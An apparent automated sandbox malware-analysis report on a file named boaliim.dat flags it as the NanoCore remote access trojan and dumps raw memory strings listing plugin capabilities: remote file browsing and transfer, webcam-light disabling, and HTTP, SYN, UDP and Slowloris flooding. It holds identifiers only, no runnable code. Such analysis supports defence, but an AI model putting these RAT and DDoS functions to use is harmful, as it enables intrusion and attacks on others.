0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: boaliim.dat	Binary or memory string: WIN_XPe
Source: boaliim.dat	Binary or memory string: WIN_VISTA
Source: boaliim.dat	Binary or memory string: WIN_7
Source: boaliim.dat	Binary or memory string: WIN_8

Remote Access Functionality

Detected Nanocore Rat

Source: boaliim.dat, 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerN